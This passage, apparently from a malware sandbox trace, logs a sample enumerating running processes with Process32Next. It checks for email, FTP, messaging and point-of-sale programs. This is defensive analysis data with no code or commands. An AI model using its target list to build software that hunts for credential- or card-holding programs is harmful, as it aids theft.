pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0191.988] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0191.991] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0191.993] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0191.996] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0191.999] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0192.001] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0192.003] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0192.005] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0192.007] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0192.009] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0192.060] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0192.063] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0192.065] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0192.071] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0192.073] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0192.075] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0192.077] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0192.079] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0192.081] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0192.083] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0192.085] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0192.088] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0192.089] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0192.091] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0192.093] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0192.095] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0192.097] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0192.100] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0192.102] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0192.104] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.106] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0192.108] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0192.109] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.111] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0192.112] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0192.114] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0192.116] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0192.117] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0192.119] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0192.121] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.122] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0192.124] CloseHandle (hObject=0x17ec) returned 1 [0192.124] Sleep (dwMilliseconds=0x64) [0192.139] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0192.303] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.304] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0192.306] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0192.308] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.311] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0192.313] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.314] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0192.316] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0192.317] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0192.319] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.320] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.323] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0192.325] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.327] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.328] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.330] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.331] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.333] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.335] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.452] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0192.454] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0192.455] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.457] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0192.458] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.460] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0192.461] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0192.463] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0192.466] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0192.467] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0192.469] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0192.470] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.472] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.473] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0192.475] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0192.477] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0192.478] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.490] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0192.492] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0192.493] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0192.495] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0192.544] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, 